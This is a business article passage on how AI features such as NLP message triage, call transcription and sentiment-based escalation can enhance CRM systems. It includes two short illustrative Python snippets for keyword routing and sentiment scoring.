Another powerful feature of an AI-enabled CRM is natural language processing (NLP). There are several ways people define NLP, but most tend to describe it as the ability of computers to understand and interpret human language the way it is written or spoken.
When a machine processes texts or spoken words from humans, they’re looking at data in 1s and 0s and not really hearing words. For AI to understand what you’re saying and turn those words into an action, NLP comes into play. Definitions aside, NLP can be used in several ways to enhance customer experience through a CRM.
For example, it can be used to determine what customers want from an email or text-based message. Customers or prospects often make similar requests through emails. A financial-based organization, for example, may receive daily messages from customers requesting new checks, or to open a new account, apply for a new credit card, or report a stolen card. Natural language processing can scan these messages and begin working on them before sales and customer support get involved.
What’s more, NLP then can determine which customer requests to prioritize. Reporting a stolen card is clearly more urgent than needing new checks. NLP can push customer and prospect requests that are urgent or time-sensitive to the front of the line, where sales and customer service can respond quickly.
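As a toy illustration of that kind of triage, the snippet below routes incoming messages by keyword and assigns a handling priority; the keyword table is hypothetical, and a real CRM would use a trained intent classifier rather than simple string matching.

```python
# Hypothetical intents mapped to a handling priority (1 = most urgent).
INTENTS = {
    "stolen":      ("report_stolen_card", 1),
    "fraud":       ("report_fraud", 1),
    "new account": ("open_account", 2),
    "credit card": ("apply_credit_card", 2),
    "new checks":  ("order_checks", 3),
}

def triage(message: str):
    text = message.lower()
    matches = [(intent, prio) for kw, (intent, prio) in INTENTS.items() if kw in text]
    if not matches:
        return ("route_to_human", 3)
    return min(matches, key=lambda m: m[1])  # the most urgent matched intent wins

inbox = [
    "Could you send me new checks for my account?",
    "My credit card was stolen yesterday, please help!",
]
for msg in sorted(inbox, key=lambda m: triage(m)[1]):
    print(triage(msg), "-", msg)
```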
When enabled through AI, NLP also can examine customer email interactions to get a better understanding of their experience, whether positive or negative. An organization that leverages insights in this way can remedy customer issues quickly, before they escalate.
Sales departments also can use AI to record voice meetings and phone calls, time-stamp specific notes, obtain transcripts, and even identify topics or words of specific meaning — like “budget,” “pricing” or “actions items” — or even target specific people. Sales teams then can return to exact moments in conversations after the call, glean specific insights, and combine them with existing CRM data to determine a best course of action.
Going deeper, AI can be used to analyze speaking patterns, word choices, or voice inflections to determine a caller’s emotions and offer resolution recommendations to sales reps, which could include telling users to slow speech pace, soften their tone, or even prompt supervisors to get involved when necessary.
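The escalation logic itself can be sketched with a naive word-list sentiment score; a real system would use a trained sentiment model plus acoustic features such as tone and pace, but the decision flow looks roughly like this.

```python
import re

NEGATIVE = {"frustrated", "angry", "cancel", "unacceptable", "terrible"}
POSITIVE = {"great", "thanks", "happy", "perfect", "resolved"}

def sentiment_score(transcript: str) -> int:
    words = re.findall(r"[a-z']+", transcript.lower())
    return sum(w in POSITIVE for w in words) - sum(w in NEGATIVE for w in words)

def next_action(transcript: str) -> str:
    score = sentiment_score(transcript)
    if score <= -2:
        return "escalate to supervisor"
    if score < 0:
        return "prompt rep to slow down and soften tone"
    return "continue as normal"

call = "This is unacceptable, I am frustrated and ready to cancel my account"
print(next_action(call))  # escalate to supervisor
```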
One of the best ways for businesses to understand the needs of their customers is through tracking feedback, which can be collected through questionnaires, reviews, online comments and more.
A well-constructed survey can provide insightful and quantitative data, discover problems or challenges, and ultimately help a business gauge its progress or improvement over time. AI technology can not only streamline customer feedback programs and tactics, but also help companies eliminate unnecessary actions by evaluating communications that happen naturally every day.
At their core, CRMs are designed to store customer information and lots of it. AI easily can be applied to keeping customer records and information up to date, with little human help or data entry. These days, there is significantly more information than name, address, phone number and email that can be harvested and added to a customer’s profile, including social media channels, applications used, and even popular geolocation visits.
While AI can help sales teams dig through industry and social media data, it also can help companies properly allocate dollars to increase account-based marketing's return on investment. Sales leaders can be handed high-value accounts or prospects that meet very specific criteria, as well as search for others that are actively looking to buy. This can help marketers focus marketing and advertising funds toward prospects with the highest buying interest and prioritize engaged leads.
Who Needs AI?
Now that we’ve touched on a few ways AI can be leveraged in your business’ CRM system, the question is, do you really need it — or is it just another superfluous addition that won’t provide you with any real value? Not surprisingly, the answer depends on your business.
The common denominator, however, is this: The more data your business collects about customers and prospects, the greater the need for a CRM solution that can not only analyze all the data, but also provide useful insights and recommendations.
The move toward more powerful and more efficient CRM systems that reduce costs and save time is now possible thanks to AI. In today’s digital age, prompt, personalized and predictive services are essential to guaranteeing customer satisfaction and creating brand loyalty.
Businesses that utilize the full power of their CRM will find value in an integrated AI tool. On the other hand, organizations that struggle with their CRM, or with figuring out if they need one, likely will find AI confusing and unnecessary.
At the end of the day, CRM and AI are just tools from the sales and marketing toolbox. Neither replaces a thoughtful marketing strategy targeted at the right time, at the right audiences, and in the right context.
Conversely, a solid marketing strategy is only as good as the technology it sits on. Before leaping into the AI waters, master the fundamentals of your existing CRM. Once you’ve done that, unleashing the power of AI will help strengthen your sales and marketing teams and improve customer satisfaction. | <urn:uuid:5de9d191-6835-49f2-be95-c4177c477bf3> | CC-MAIN-2022-40 | https://www.ecommercetimes.com/story/better-customer-satisfaction-through-ai-enabled-crm-86029.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00594.warc.gz | en | 0.944008 | 1,836 | 2.875 | 3 |